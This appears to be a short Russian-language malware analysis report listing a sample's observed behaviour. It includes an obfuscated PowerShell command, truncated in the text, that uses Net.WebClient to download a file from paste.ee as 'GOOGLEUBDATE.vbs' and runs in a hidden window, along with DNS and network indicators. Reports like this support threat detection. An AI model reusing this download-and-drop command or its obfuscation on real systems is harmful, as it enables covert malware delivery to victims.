Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $cccccvcv10101tgtgf='C:\Users\'+ $env:UserName +'\GOOGLEUBDATE.vbs';((n`e`W`-Obj`E`c`T (('N'+'et.'+'Web'+'cli'+'ent'))).(('D'+'ow'+'nlo'+'a'+'dFile')).invoke((('https://paste.ee/d/ks1md/0',$ccc...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1512
- %TEMP%\1166528.cvr
- 'pa##e.ee':443
- 'pa##e.ee':443
- DNS ASK pa##e.ee
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $cccccvcv10101tgtgf='C:\Users\'+ $env:UserName +'\GOOGLEUBDATE.vbs';((n`e`W`-Obj`E`c`T (('N'+'et.'+'Web'+'cli'+'ent'))).(('D'+'ow'+'nlo'+'a'+'dFile')).invoke((('https://paste.ee/d/ks1md/0',$ccc...' (со скрытым окном)